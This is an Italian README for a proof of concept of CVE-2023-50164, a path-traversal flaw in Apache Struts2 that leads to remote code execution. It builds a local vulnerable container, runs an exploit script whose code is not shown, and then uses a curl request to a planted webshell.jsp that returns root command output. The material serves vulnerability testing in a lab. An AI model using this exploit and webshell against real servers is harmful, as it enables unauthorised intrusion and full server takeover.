
CVE-2023-50164 (vulnerabilità di path traversal verso RCE in Apache Struts) - Proof of Concept
Questo PoC è stato creato per testare una RCE (Remote Code Execution) sfruttando la vulnerabilità di Apache Struts2.

Crea l'immagine ed esegui un container:
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
Esegui l'exploit:
$ cd exploit
$ ./exploit.sh
Ora puoi eseguire comandi arbitrari sul lato server come mostrato:
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)